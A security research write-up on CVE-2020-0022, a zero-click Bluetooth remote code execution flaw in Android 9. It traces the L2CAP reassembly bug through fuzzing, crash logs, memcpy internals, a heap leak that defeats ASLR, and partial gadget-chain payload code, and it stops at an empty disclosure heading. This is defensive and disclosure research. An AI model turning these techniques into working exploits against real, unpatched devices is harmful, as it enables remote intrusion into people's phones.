Nowadays, Bluetooth is an integral part of mobile devices. Smartphones interconnect with smartwatches and wireless headphones. By default, most devices are configured to accept Bluetooth connections from any nearby unauthenticated device. Bluetooth packets are processed by the Bluetooth chip (also called a controller) and then passed to the host (Android, Linux, etc.). Both the firmware on the chip and the host Bluetooth subsystem are targets for Remote Code Execution (RCE) attacks.
One feature that is available on most classic Bluetooth implementations is answering Bluetooth pings. All an attacker needs to know is the device’s Bluetooth address. Even if the target is not discoverable, it typically accepts connections if it gets addressed. For example, an attacker can run l2ping, which establishes an L2CAP connection and sends echo requests to the remote target.
In the following, we describe a Bluetooth zero-click short-distance RCE exploit against Android 9, which was assigned CVE-2020-0022. We go through all steps required to establish a remote shell on a Samsung Galaxy S10e, which was running an up-to-date Android 9 when we reported the issue on November 3, 2019. The initial flaw used for this exploit is still present in Android 10, but we utilize an additional bug in Bionic (Android’s libc implementation), which makes exploitation much easier. The bug was finally fixed in the security patch from February 1, 2020 (A-143894715). Here is a demo of the full proof of concept:
Previous Work
During the work on InternalBlue and Frankenstein at SEEMOO, we spent a lot of time investigating the Broadcom Bluetooth firmware. InternalBlue was initially written by Dennis Mantz, and it interacts with the firmware to add debugging capabilities. Within this project, we did a lot of reverse engineering to understand the details of the firmware itself.
For further analysis, we built Frankenstein, which emulates the firmware for fuzzing. To achieve emulation, an essential part is understanding the Bluetooth Core Scheduler (BCS). This component is of interest, as it also processes the packet and payload header, and manages time-critical tasks. These low-level functions are not accessible from the host, and not even within the threaded components of the firmware itself. By accessing the BCS, we were even able to inject raw wireless frames into the emulated firmware.
When fuzzing with Frankenstein, we focused on vulnerabilities that arise prior to pairing. In these parts of the protocol, we found two vulnerabilities, one in classic Bluetooth and one in Bluetooth Low Energy (BLE). The first heap overflow is in the processing of Bluetooth scan results (EIR packets), affecting firmware with build dates in the range 2010-2018, possibly even older (CVE-2019-11516). For this, we provided a full RCE Proof-of-Concept (PoC) to Broadcom in April 2019. After the report, Broadcom claimed that they knew of the issue, and indeed, the newest Samsung Galaxy S10e had a patch that we were not aware of, as it had just been released. The second heap overflow affects all BLE Packet Data Units (PDUs) since Bluetooth 4.2. We provided a PoC to Broadcom in June 2019, which corrupts the heap but misses one primitive that would be achieved with more data throughput. To the best of our knowledge, this issue has not been fixed as of February 2020.
While working on PoCs and ideas on how to get a lot of data into the heap, we also looked into classic Bluetooth Asynchronous Connection-Less (ACL) packets. These are primarily used for data transfer, such as music streaming, tethering, or, more generally, L2CAP. Within the firmware, ACL processing is comparatively simple. There are far more sophisticated handlers and proprietary protocol extensions. For example, Jiska Classen found a Link Management Protocol (LMP) type confusion (CVE-2018-19860).
Fuzzing ACL
The bug described in this post was triggered within ACL. We fuzzed this protocol by performing bit flips on the packet and payload header. The initial fuzzer was implemented by hooking the function bcs_dmaRxEnable within the firmware, which is invoked by the BCS ACL task. bcs_dmaRxEnable copies wireless frames into the transmit buffer. Prior to this function, the packet and payload headers are already written to the corresponding hardware registers. We are therefore able to modify the full packet before transmission and thus build a simple Bluetooth fuzzer within the firmware.
In the initial setup, we ran l2ping on a Linux host against an Android device over the air, and the Bluetooth firmware fuzzer flipped bits randomly in the headers. We were trying to crash the firmware of the Android device, but the Android Bluetooth daemon crashed instead. In the logs, we observed several crash reports like this:
pid: 14808, tid: 14858, name: HwBinder:14808_ >>> com.android.bluetooth <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x79cde00000
    x0  00000079d18360e1  x1  00000079cddfffcb  x2  fffffffffff385ef  x3  00000079d18fda60
    x4  00000079cdd3860a  x5  00000079d18360df  x6  0000000000000000  x7  0000000000000000
    x8  0000000000000000  x9  0000000000000000  x10 0000000000000000  x11 0000000000000000
    x12 0000000000000000  x13 0000000000000000  x14 ffffffffffffffff  x15 2610312e00000000
    x16 00000079bf1a02b8  x17 0000007a5891dcb0  x18 00000079bd818fda  x19 00000079cdd38600
    x20 00000079d1836000  x21 0000000000000097  x22 00000000000000db  x23 00000079bd81a588
    x24 00000079bd819c60  x25 00000079bd81a588  x26 0000000000000028  x27 0000000000000041
    x28 0000000000002019  x29 00000079bd819df0
    sp  00000079bd819c50  lr  00000079beef4124  pc  0000007a5891ddd4
backtrace:
    #00 pc 000000000001ddd4 /system/lib64/libc.so (memcpy+292)
    #01 pc 0000000000233120 /system/lib64/libbluetooth.so (reassemble_and_dispatch(BT_HDR*) [clone .cfi]+1408)
    #02 pc 000000000022fc7c /system/lib64/libbluetooth.so (BluetoothHciCallbacks::aclDataReceived(android::hardware::hidl_vec<unsigned char> const&)+144)
    [...]
It seems that memcpy is executed with a negative length inside reassemble_and_dispatch. A simplified implementation of memcpy looks as follows:
void *memcpy(char *dst, const char *src, size_t n) {
    for (size_t i = 0; i < n; i++)
        dst[i] = src[i];
    return dst;
}
The length parameter n is of type size_t and, thus, an unsigned integer. If we pass a negative number as n, it will be interpreted as a large positive number because of the two's-complement representation.
As a result, memcpy tries to copy memory in an endless loop, which causes the crash as soon as we hit unmapped memory.
L2CAP Fragmentation
Bluetooth implements fragmentation on various layers. Within the analysis of this crash, we focus on the fragmentation of L2CAP packets passed between the controller and the host. For commands and configuration between host and controller, the Host Controller Interface (HCI) is used.
L2CAP is sent as ACL packets via the same UART wires as HCI. It needs to be fragmented to the maximum ACL packet length. During firmware initialization, the driver on the host issues the HCI command Read Buffer Size to query this length. On Broadcom chips, this size is 1021. The host’s driver needs to respect these size limits when sending packets to the firmware. Similarly, the firmware also rejects L2CAP inputs that are not properly fragmented over the air. As fragmentation and reassembly happen on the host, but the firmware itself also has strict size limits, L2CAP is interesting for heap exploitation on the host and the controller.
If an L2CAP packet is received whose length exceeds the maximum buffer size of 1021, it has to be reassembled. The partial packet is stored in a map called partial_packets with the connection handle as the key. A buffer that is sufficiently large to hold the final packet is allocated, and the received data is copied to that buffer. The end of the last received fragment is stored in partial_packet->offset.
Subsequent packets have the continuation flag set to indicate that they are packet fragments. It is the 12th bit in the connection handle inside the ACL header. If such a packet is received, the packet content is then copied to the previous offset.
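As a minimal sketch of how the continuation flag sits inside the 16-bit handle field, the snippet below splits the field into connection handle, Packet Boundary (PB) flag, and Broadcast (BC) flag, following the HCI ACL header layout of the Bluetooth Core Specification. The helper names parse_acl_handle and is_continuation are made up for this illustration, and 0x200b and 0x100b are just sample field values.

```python
# Bits 0-11: connection handle, bits 12-13: PB flag, bits 14-15: BC flag.
PB_CONTINUATION = 0b01  # continuing fragment of a higher-layer message
PB_START = 0b10         # first (automatically flushable) fragment


def parse_acl_handle(field: int) -> dict:
    """Split the 16-bit handle field of an HCI ACL header (hypothetical helper)."""
    return {
        "handle": field & 0x0FFF,
        "pb_flag": (field >> 12) & 0b11,
        "bc_flag": (field >> 14) & 0b11,
    }


def is_continuation(field: int) -> bool:
    """True if bit 12 marks the packet as a continuation fragment."""
    return parse_acl_handle(field)["pb_flag"] == PB_CONTINUATION


for raw in (0x200B, 0x100B):
    parts = parse_acl_handle(raw)
    kind = "continuation" if is_continuation(raw) else "start"
    print(f"0x{raw:04x}: handle=0x{parts['handle']:02x} ({kind})")
```

Both sample values carry the same connection handle 0x0b and differ only in the PB flag.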
static void reassemble_and_dispatch(UNUSED_ATTR BT_HDR *packet) {
  [...]
  packet->offset = HCI_ACL_PREAMBLE_SIZE;
  uint16_t projected_offset =
      partial_packet->offset + (packet->len - HCI_ACL_PREAMBLE_SIZE);
  if (projected_offset > partial_packet->len) {  // len stores the expected length
    LOG_WARN(LOG_TAG,
             "%s got packet which would exceed expected length of %d."
             "Truncating.",
             __func__, partial_packet->len);
    packet->len = partial_packet->len - partial_packet->offset;
    projected_offset = partial_packet->len;
  }
  memcpy(partial_packet->data + partial_packet->offset,
         packet->data + packet->offset,
         packet->len - packet->offset);
  [...]
}
This step causes the negative length memcpy, as seen in the code above. Consider a situation where we receive a continuation packet and there are only 2 bytes left to receive. If the continuation is longer than expected, packet->len is truncated to avoid buffer overflows. The length is set to the number of bytes that are left to copy.
As we need to skip the HCI and ACL preamble, we use HCI_ACL_PREAMBLE_SIZE (4) as the packet offset and subtract it from the number of bytes to copy. This results in a negative length of -2 for memcpy.
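The arithmetic can be replayed in a few lines. The following is only a model of the length computation in reassemble_and_dispatch, not the Android code itself; the function name continuation_memcpy_length and the example numbers (an expected length of 100 with 98 bytes already stored) are chosen for illustration.

```python
HCI_ACL_PREAMBLE_SIZE = 4
UINT16_MASK = 0xFFFF           # BT_HDR len and offset are 16-bit fields
SIZE_T_MASK = (1 << 64) - 1    # size_t is 64 bits wide on aarch64


def continuation_memcpy_length(partial_len, partial_offset, packet_len):
    """Model the third memcpy argument for a continuation fragment.

    partial_len:    expected total length of the reassembled packet
    partial_offset: number of bytes already stored
    packet_len:     len of the incoming fragment, including the preamble
    """
    packet_offset = HCI_ACL_PREAMBLE_SIZE
    projected_offset = (
        partial_offset + (packet_len - HCI_ACL_PREAMBLE_SIZE)
    ) & UINT16_MASK
    if projected_offset > partial_len:
        # Truncation branch: len becomes the number of missing bytes, which
        # no longer accounts for the preamble that is subtracted below.
        packet_len = (partial_len - partial_offset) & UINT16_MASK
    signed_length = packet_len - packet_offset
    # Converting the negative int to size_t wraps it around.
    return signed_length & SIZE_T_MASK


# Well-formed continuation: exactly the 2 missing bytes plus the preamble.
print(hex(continuation_memcpy_length(100, 98, 6)))
# Oversized continuation: 10 payload bytes although only 2 are missing.
print(hex(continuation_memcpy_length(100, 98, 14)))
```

The first call yields 2, the second yields 0xfffffffffffffffe, which is -2 once it is interpreted as a size_t.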
This has been addressed in master, but at this point in time not in the android10-c2f2-release branch, the android10-dev branch, the android-10.0.0_r9 tag, or the android-9.0.0_r49 tag running on the S10e at that point in time. A fix has been deployed in android-8.0.0_r43, android-8.1.0_r73, android-9.0.0_r53, and android-10.0.0_r29.
Unexpected leak
The above-mentioned bug seems not to be exploitable, as we end up in an endless memcpy. Yet, we occasionally crash in completely different locations. For example, the following crash is located in the same thread, but cannot be explained with a simple infinite copy loop. Thus, we expected to find a different bug somewhere.
pid: 14530, tid: 14579, name: btu message loo >>> com.android.bluetooth <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7a9e0072656761
    x0  0000007ab07d72c0  x1  0000007ab0795600  x2  0000007ab0795600  x3  0000000000000012
    x4  0000000000000000  x5  0000007a9e816178  x6  fefeff7a3ac305ff  x7  7f7f7f7f7fff7f7f
    x8  007a9e0072656761  x9  0000000000000000  x10 0000000000000020  x11 0000000000002000
    x12 0000007aa00fc350  x13 0000000000002000  x14 000000000000000d  x15 0000000000000000
    x16 0000007b396f6490  x17 0000007b3bc46120  x18 0000007a9e81542a  x19 0000007ab07d72c0
    x20 0000007ab0795600  x21 0000007a9e817588  x22 0000007a9e817588  x23 000000000000350f
    x24 0000000000000000  x25 0000007ab07d7058  x26 000000000000008b  x27 0000000000000000
    x28 0000007a9e817588  x29 0000007a9e816340
    sp  0000007a9e8161e0  lr  0000007a9fde0ca0  pc  0000007a9fe1a9a4
backtrace:
    #00 pc 00000000003229a4 /system/lib64/libbluetooth.so (list_append(list_t*, void*) [clone .cfi]+52)
    #01 pc 00000000002e8c9c /system/lib64/libbluetooth.so (l2c_link_check_send_pkts(t_l2c_linkcb*, t_l2c_ccb*, BT_HDR*) [clone .cfi]+100)
    #02 pc 00000000002ea25c /system/lib64/libbluetooth.so (l2c_rcv_acl_data(BT_HDR*) [clone .cfi]+1236)
    [...]
We spent a couple of sleepless nights tracking down these crashes and modified the fuzzing setup to be reproducible. However, it was not possible to reproduce these interesting crashes by replaying packets. The main issue during debugging was that we did not compile Android with an address sanitizer. This would have detected any memory corruption as it happens before crashing in a random location. So, in a moment of frustration, we decided to cheat a little bit. By keeping the payload of the L2Ping packets constant, we can compare it with the payload of the response. If the data changes meanwhile, a memory corruption took place but did not produce a crash yet. After running this for a while, we get corrupted responses like this:
With this detection method, we were even able to reproduce this behavior reliably. The following packet combination triggers it:
- L2CAP packet containing ‘A’s, with 2 bytes remaining for continuation
- Continuation containing ‘B’s that is longer than the expected 2 bytes
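The detection idea of comparing a constant echo payload with the response can be sketched as follows. This is not the script used for the post; corrupted_ranges is a hypothetical helper that only performs the comparison, and the sample response bytes are invented. Sending and receiving the echo is left out on purpose.

```python
def corrupted_ranges(sent: bytes, received: bytes):
    """Return (start, end) index pairs, end exclusive, where the echo differs."""
    ranges = []
    start = None
    total = max(len(sent), len(received))
    for i in range(total):
        a = sent[i] if i < len(sent) else None
        b = received[i] if i < len(received) else None
        if a != b:
            if start is None:
                start = i          # a new run of differing bytes begins
        elif start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, total))
    return ranges


sent = b"A" * 16
received = b"A" * 12 + b"\x0b\x20BB"   # made-up response with a modified tail
print(corrupted_ranges(sent, received))
```

An empty result means the echo came back unchanged; any reported range marks bytes that were modified on the remote side without a crash.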
In Android logcat, we can observe the following error message:
bt_hci_packet_fragmenter: reassemble_and_dispatch got packet which would exceed expected length of 147. Truncating.
This trigger looks similar to the bug described above. Note that only the last bytes are corrupted, whereas the beginning of the packet is still correct. This behavior cannot be explained by the source code and what we know so far. A straight buffer overflow that keeps the first couple of bytes intact or overwrites pointers and offsets in such a controlled manner is rather unlikely. At this point, we decided to set breakpoints in the packet_fragmenter to observe where the packet data is modified. We used the following GDB script to debug that behavior, where reassemble_and_dispatch+1408 and reassemble_and_dispatch+1104 are the two memcpy calls in reassemble_and_dispatch as described earlier.
b reassemble_and_dispatch
commands
    x/32x $x0
    c
end
b dispatch_reassembled
commands
    x/i $lr
    x/32x $x0
    c
end
b *(reassemble_and_dispatch+1408)
commands
    p $x0
    p $x1
    p $x2
    c
end
b *(reassemble_and_dispatch+1104)
commands
    p $x0
    p $x1
    p $x2
    c
end
For the first packet containing ‘A’s, we can observe the following log. It is received as expected, and the first memcpy is triggered with a length of 0x52 bytes. This length is also visible in the BT_HDR struct inside the packet and is correct. The length included in the ACL and L2CAP header is two bytes longer than the actual payload in order to trigger the reassembly of the packet. The connection handle in the HCI header is 0x200b and indicates a start packet for the connection handle 0x0b.
The second packet also arrives correctly in reassemble_and_dispatch. The connection handle has changed to 0x100b and indicates a continuation packet. The third argument to memcpy is 0xfffffffffffffffe, aka -2, as pointed out above. As memcpy treats the third parameter as an unsigned integer, this memcpy should result in a crash.
But apparently, the application continues and corrupts the last 66 bytes of the partial packet and the corrupted packet is passed to dispatch_reassembled.
memwtf(,,-2);
If we take a closer look at the actual memcpy implementation, it is more complex than the simple character-wise memcpy shown above. It is more efficient to copy whole words of memory instead of individual bytes. This implementation takes it one step further and fills registers with 64 bytes of memory content before writing it to the target location. Such an implementation is more complex and has to consider edge cases such as odd lengths and misaligned addresses.
This memcpy implementation behaves in a weird way for negative lengths. As we try to copy to the end of the destination buffer, we overwrite the last 66 bytes of the L2Ping request with whatever precedes our second packet. We have written this short PoC to test the memcpy behavior.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    if (argc < 3) {
        printf("usage %s offset_dst offset_src\n", argv[0]);
        exit(1);
    }
    char *src = malloc(256);
    char *dst = malloc(256);
    printf("src=%p\n", (void *)src);
    printf("dst=%p\n", (void *)dst);
    for (int i=0; i<256; i++) src[i] = i;
    memset(dst, 0x23, 256);

    // Copy with a length of -2, starting in the middle of both buffers
    memcpy(
        dst + 128 + atoi(argv[1]),
        src + 128 + atoi(argv[2]),
        0xfffffffffffffffe
    );

    //Hexdump
    for(int i=0; i<256; i+=32) {
        printf("%04x: ", i);
        for (int j=0; j<32; j++) {
            printf("%02x", dst[i+j] & 0xff);
            if (j%4 == 3) printf(" ");
        }
        printf("\n");
    }
    return 0;
}
The behavior was analyzed in Unicorn emulating the aarch64 memcpy implementation. The relevant code is shown in the following:
    prfm PLDL1KEEP, [src]
    add srcend, src, count
    add dstend, dstin, count
    cmp count, 16
    b.ls L(copy16)              //Not taken as 0xfffffffffffffffe > 16
    cmp count, 96
    b.hi L(copy_long)           //Taken as 0xfffffffffffffffe > 96
    [...]
L(copy_long):
    and tmp1, dstin, 15         //tmp1 = lower 4 bits of destination
    bic dst, dstin, 15
    ldp D_l, D_h, [src]
    sub src, src, tmp1
    add count, count, tmp1      /* Count is now 16 too large. */
                                //It is not only too large
                                //but might also be positive!
                                //0xfffffffffffffffe + 0xe = 0xc
    ldp A_l, A_h, [src, 16]
    stp D_l, D_h, [dstin]
    ldp B_l, B_h, [src, 32]
    ldp C_l, C_h, [src, 48]
    ldp D_l, D_h, [src, 64]!
    subs count, count, 128 + 16 /* Test and readjust count. */
                                //This will become negative again
    b.ls 2f                     //So this branch is taken
    [...]
    /* Write the last full set of 64 bytes. The remainder is at most 64
       bytes, so it is safe to always copy 64 bytes from the end even if
       there is just 1 byte left. */
    //This will finally corrupt -64...64 bytes and terminate
2:
    ldp E_l, E_h, [srcend, -64]
    stp A_l, A_h, [dst, 16]
    ldp A_l, A_h, [srcend, -48]
    stp B_l, B_h, [dst, 32]
    ldp B_l, B_h, [srcend, -32]
    stp C_l, C_h, [dst, 48]
    ldp C_l, C_h, [srcend, -16]
    stp D_l, D_h, [dst, 64]
    stp E_l, E_h, [dstend, -64]
    stp A_l, A_h, [dstend, -48]
    stp B_l, B_h, [dstend, -32]
    stp C_l, C_h, [dstend, -16]
    ret
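To make the count arithmetic in copy_long easier to follow, here is a small model of just the two relevant steps: adding the lower four bits of the destination address to the count, and the unsigned comparison behind `subs count, count, 128 + 16` followed by `b.ls`. It is a sketch of the listing above, not an emulation of the full routine; the function names and the base address 0x7000 are assumptions made for this example.

```python
MASK64 = (1 << 64) - 1


def copy_long_terminates(dst_addr: int, count: int = -2) -> bool:
    """True if `b.ls 2f` is taken, so memcpy returns instead of looping on."""
    count &= MASK64                    # -2 becomes 0xfffffffffffffffe
    tmp1 = dst_addr & 15               # and tmp1, dstin, 15
    count = (count + tmp1) & MASK64    # add count, count, tmp1 (may wrap to a small value)
    # subs count, count, 144 ; b.ls 2f -> taken if count <= 144 (unsigned)
    return count <= 128 + 16


def tail_window(count: int = -2):
    """Byte range, relative to dstin and src, touched by the final 64-byte copy."""
    end = count                        # dstend - dstin == srcend - src == count
    return (end - 64, end)


for nibble in range(16):
    state = "returns" if copy_long_terminates(0x7000 + nibble) else "keeps copying"
    print(f"dst & 15 = {nibble:#x}: {state}")
print("tail copy covers offsets", tail_window())
```

In this model, the wrapped count stays huge only when the lower nibble of the destination is 0 or 1; for every other alignment the branch is taken and the routine finishes with the tail copy. That tail copy covers the offsets -66 to -2 relative to both pointers, which fits the observation that the last 66 bytes of the partial packet are overwritten with data located in front of the source.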
On Android 10, memcpy is wrapped by memmove. As we are dealing with a very large count value (0xfffffffffffffffe, that is, -2 interpreted as unsigned), it will always be larger than the distance between dst and src. Therefore __memcpy will never be called in our case, which makes this bug unexploitable on Android 10.
Leaking More Data
As described above, we can essentially overwrite the last 64 bytes of the packet with whatever happens to be in front of our source address. The first 20 bytes before the source buffer are always BT_HDR, acl_hdr, and l2cap_hdr. We therefore automatically leak the connection handle of the remote device.
The content of the uninitialized memory depends on the placement of the second packet buffer and therefore its size. By repeatedly sending regular L2Ping echo requests, we can try to place our own packet data in front of the second packet. This allows us to control the last 44 bytes of the packet with arbitrary data. By shortening the first packet, we can control the full packet struct including the headers. The first packet looks like the following:
After triggering the bug, the corrupted packet looks like the following. The packet containing the ‘X’ is the one we have placed in front of our source buffer. Note that, except for the length in BT_HDR, the packet length is now 0x280 instead of 0x30. The packet->len field must still hold the original length; otherwise, the reassemble method would expect further data.
This results in a much more useful leak. Note that this is a data-only attack without code execution or any other additional information required. It can also be used to inject arbitrary L2CAP traffic into any active connection handles. A successful leak might look as follows:
In order to defeat Address Space Layout Randomization (ASLR), we need the base address of some libraries. Occasionally we find an object from libicuuc.so on the heap, which has the following structure:
- Some heap pointer
- Pointer to uhash_hashUnicodeString_60 at libicuuc.so
- Pointer to uhash_compareUnicodeString_60 at libicuuc.so
- Pointer to uhash_compareLong_60 at libicuuc.so
- Pointer to uprv_deleteUObject_60 at libicuuc.so
We can use the offsets between those functions to reliably detect this structure within the leak. This allows us to compute the base address of libicuuc.so.
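A search for this structure might look like the sketch below. It assumes the four function pointers are stored back to back as little-endian 64-bit values and that the library is mapped at a page-aligned address. The numbers in SYMBOL_OFFSETS are placeholders invented for the example; the real offsets have to be taken from the libicuuc.so of the target device. The name find_libicuuc_base is also hypothetical.

```python
import struct

# Placeholder offsets, NOT the real ones: read them from the target's library.
SYMBOL_OFFSETS = [
    0x1A2B30,  # uhash_hashUnicodeString_60
    0x1A2C10,  # uhash_compareUnicodeString_60
    0x1A2D48,  # uhash_compareLong_60
    0x0F3E90,  # uprv_deleteUObject_60
]


def find_libicuuc_base(leak: bytes, offsets=SYMBOL_OFFSETS):
    """Scan leaked bytes for the pointer quadruple and return the library base."""
    n = len(offsets)
    # Step byte-wise, because the alignment of the leak window is unknown.
    for pos in range(0, len(leak) - 8 * n + 1):
        ptrs = struct.unpack_from("<%dQ" % n, leak, pos)
        base = ptrs[0] - offsets[0]
        if base <= 0 or base & 0xFFF:
            continue  # not a plausible page-aligned base address
        # All pointers must agree on the same base, i.e. have the known deltas.
        if all(p - o == base for p, o in zip(ptrs, offsets)):
            return base
    return None


# Self-made test leak: padding, a heap pointer, then the four function pointers.
fake_base = 0x7A58900000
leak = (
    b"\x00" * 13
    + struct.pack("<Q", 0x79CDD38600)
    + struct.pack("<4Q", *[fake_base + o for o in SYMBOL_OFFSETS])
    + b"\xff" * 5
)
found = find_libicuuc_base(leak)
print(hex(found) if found is not None else "structure not found")
```

Requiring all four pointers to resolve to the same page-aligned base keeps accidental matches in random heap data unlikely.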
PC Control and Payload Location
Several libraries, such as libbluetooth.so, are protected by Clang’s Control Flow Integrity (CFI) implementation. This protects forward edges and should prevent us from simply overwriting function vtables on the heap with arbitrary addresses. Only functions that belong to the affected object should be callable. Even so, upon disconnect, we occasionally trigger the following crash after corrupting the heap.
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x37363534333231
    x0  3837363534333231  x1  000000750c2649e0  x2  000000751e50a338  x3  0000000000000000
    x4  0000000000000001  x5  0000000000000001  x6  00000075ab788000  x7  0000000001d8312e
    x8  00000075084106c0  x9  0000000000000001  x10 0000000000000001  x11 0000000000000000
    x12 0000000000000047  x13 0000000000002000  x14 000f5436af89ca08  x15 000024747b62062a
    x16 000000750c2f55d8  x17 000000750c21b088  x18 000000750a660066  x19 000000751e50a338
    x20 000000751e40dfb0  x21 000000751e489694  x22 0000000000000001  x23 0000000000000000
    x24 000000750be85f64  x25 000000750a661588  x26 0000000000000005  x27 00000075084106b4
    x28 000000750a661588  x29 000000750a65fd30
    sp  000000750a65fd10  lr  000000750c264bb8  pc  000000750c264c5c
backtrace:
    #00 pc 00000000000dbc5c /system/lib64/libchrome.so (base::WaitableEvent::Signal()+200)
    #01 pc 00000000000add88 /system/lib64/libchrome.so (base::internal::IncomingTaskQueue::PostPendingTask(base::PendingTask*)+320)
    [...]
    #09 pc 00000000002dd0a8 /system/lib64/libbluetooth.so (L2CA_DisconnectRsp(unsigned short) [clone .cfi]+84)
    #10 pc 0000000000307a08 /system/lib64/libbluetooth.so (sdp_disconnect_ind(unsigned short, bool) [clone .cfi]+44)
    #11 pc 00000000002e39d4 /system/lib64/libbluetooth.so (l2c_csm_execute(t_l2c_ccb*, unsigned short, void*) [clone .cfi]+5500)
    #12 pc 00000000002eae04 /system/lib64/libbluetooth.so (l2c_rcv_acl_data(BT_HDR*) [clone .cfi]+4220)
    [...]
During the leak process, we do not only overflow into the negative direction, but also corrupt data that is stored after the affected buffer. In this particular case, we have overwritten a pointer stored in X0.
Looking at the location in the code, we crash a few instructions before a blr whose target register is derived from X0.
dbc5c: f9400008 ldr x8, [x0]    // We control X0
dbc60: f9400108 ldr x8, [x8]
dbc64: aa1403e1 mov x1, x20
dbc68: d63f0100 blr x8          // Branch to **X0
If we know an address where we can store arbitrary data, we can control pc! libchrome.so was not compiled with CFI enabled. Our packet data has to be stored on the heap somewhere, but we also need a way to retrieve the address, to gain RCE. This was achieved as the partial packets are stored in a hash map with the connection handle as a key:
BT_HDR* partial_packet =
    (BT_HDR*)buffer_allocator->alloc(full_length + sizeof(BT_HDR));
[...]
memcpy(partial_packet->data, packet->data, packet->len);
[...]
partial_packets[handle] = partial_packet;
This will allocate a map object on the heap, holding the key (handle) and a pointer to our packet. Eventually, we can leak this map object, revealing the pointer to our buffer. As the key is known, we can use it to detect this object in the leak. By using the maximum allowed packet size, we have a few hundred bytes to store our ROP chain and payload.
This overall method is not perfectly reliable but works in 30%-50% of the cases. However, the Bluetooth daemon is restarted automatically and forked by the same process. Therefore, the address space is only randomized on boot. Even if we crash the daemon, it is restarted with the same address layout, so an attacker can try over and over again to gain RCE.
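To get a feeling for what repeated attempts mean in practice, the following back-of-the-envelope calculation assumes that every attempt succeeds independently with the same probability. That independence is an assumption made for this sketch, not something we measured, and success_after is a hypothetical helper.

```python
def success_after(p_single: float, attempts: int) -> float:
    """Probability of at least one success in `attempts` independent tries."""
    return 1.0 - (1.0 - p_single) ** attempts


for p in (0.3, 0.5):
    for n in (1, 3, 5, 10):
        print(f"p={p:.1f}, attempts={n:2d}: {success_after(p, n):.3f}")
```

Under this assumption, even the lower bound of 30% per attempt exceeds 97% after ten attempts.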
Calling system();
Even though we know the absolute address of libicuuc.so, the offsets between the libraries are randomized as well. Therefore we only have gadgets available in that library.
libicuuc.so itself calls no interesting functions, such as system calls. At this point, Fabian Beterke pointed out that it would be a good idea to check the library imports for something interesting.
We have no direct use of system or execve, but we have dlsym available. This function requires a handle (e.g., a NULL pointer) and a function name as arguments. It resolves and returns the address of that function and can be used to obtain the address of system. Therefore we need to perform a function call and return from it in a controlled way. In ROP, this is usually not a problem, as the gadgets have to end with a return anyway. However, we have no way to perform the stack pivot required for ROP. Thus, we have to use C++ object calls to perform the desired operations, which are often relative to X8 or X19. As a consequence, we have lots of relative references in our payload. To keep track of already used offsets, we implement a function called set_ptr( payload, offset, value) that throws an error if a given offset in the payload is already used. We also keep track of the register values in order to simplify the process.
To return cleanly from dlsym, we used a destructor called u_cleanup_60. It iterates over a list of function pointers; if a pointer is not NULL, the address is called and the pointer is cleared. This is quite convenient, as we can call dlsym and control the execution after the return, without a stack pivot.
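The bookkeeping behind such a set_ptr helper can be sketched as follows. This is not the function from the exploit, only one possible way to implement the described behavior; the use of a bytearray, the 8-byte slot size, the module-level bookkeeping dictionary, and the example addresses are all assumptions.

```python
import struct

# Bookkeeping per payload buffer: which byte offsets are already occupied.
_used_offsets = {}


def set_ptr(payload: bytearray, offset: int, value: int) -> None:
    """Write a little-endian 64-bit pointer and refuse to overwrite earlier ones."""
    if offset < 0 or offset + 8 > len(payload):
        raise ValueError("offset 0x%x is outside of the payload" % offset)
    used = _used_offsets.setdefault(id(payload), set())
    span = set(range(offset, offset + 8))
    if used & span:
        raise ValueError("offset 0x%x overlaps an already used slot" % offset)
    struct.pack_into("<Q", payload, offset, value)
    used |= span


payload = bytearray(0x100)
payload_base = 0x7AB0795600                # hypothetical address of our buffer
set_ptr(payload, 0x00, payload_base + 0x18)
set_ptr(payload, 0x18, 0x7A58912345)       # hypothetical gadget address
try:
    set_ptr(payload, 0x1C, 0)              # overlaps the slot at 0x18
except ValueError as err:
    print("rejected:", err)
```

Failing loudly on overlapping slots catches collisions early when offsets in the payload are shuffled around.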
ldr x8, [x19, #0x40]
cbz x8, #0xbc128
blr x8
str xzr, [x19, #0x40]
ldr x8, [x19, #0x48]
cbz x8, #0xbc138
blr x8
str xzr, [x19, #0x48]
ldr x8, [x19, #0x50]
cbz x8, #0xbc148
blr x8
str xzr, [x19, #0x50]
ldr x8, [x19, #0x58]
cbz x8, #0xbc158
blr x8
To set x19, let's first recap the preconditions:
- x0 points to our buffer
- We know the address of our buffer
- The first address in our buffer is a pointer that points to a pointer to our gadget
Furthermore, we have a list of gadgets in a text file so we can grep for them. We can discard all gadgets that end with a ret instruction, as we can’t use them right now. There are still several gadgets left that end with a br register or blr register instruction and can be used. In addition, we need a gadget that loads data relative to x0, as this is the only register with a known value. So you might run something like this:
cat gadgets | grep -v ret | grep "ldr x., \[x0"
You might find a gadget that looks like this:
ldr x0, [x0, #8] ; ldr x8, [x0] ; ldr x2, [x8, #0x20] ; br x2
This gadget has two properties that make it useful:
- It allows specifying the next gadget by using registers that we already have under control
- It performs a useful operation. In this case, it sets x8 to point within our buffer.
This gives us one more degree of freedom, as we can now also utilize gadgets that use x8. So, we will populate our payload buffer with lots of pointers that point into our buffer and are referenced relative to some offset, which gets confusing quickly. Therefore it is helpful to keep track of already used offsets (accomplished by the set_ptr function as described above) as well as register values. New register values have to be chosen in a way that avoids collisions. This way, we can change the offset of register values within the buffer without too much effort.
# Initial condition
# Signal() ldr x8, [x0], ldr x8, [x8], mov x1, x20; blr x8
# x0 points to our buffer
pc_offset = 0x18  # Arbitrary offset
x0 = payload_base

# Initial **x0 = gadget1
set_ptr( payload_ptr, x0 - payload_base, payload_base + pc_offset)

# Set x8 - Set gadget
g = find_gadget(sys.argv[2], "ldr x0, [x0, #8] ; ldr x8, [x0] ; ldr x2, [x8, #0x20] ; br x2")
set_ptr( payload_ptr, pc_offset, g + libicuuc_base)

# Set x8 - Set registers values
x0_new = payload_base + 0x30  # Arbitrary offset
set_ptr( payload_ptr, x0 - payload_base + 0x8, x0_new)
x0 = x0_new
x8 = payload_base + 0x8  # New x8 also arbitrary offset
set_ptr( payload_ptr, x0 - payload_base, x8)
pc_offset = x8 - payload_base + 0x20
Next, we can use a gadget like the following in a similar way to get x19 under control.
ldr x8, [x8, #8] ; mov x19, x0 ; mov x0, x22 ; blr x8
Disclosure and Closing Words
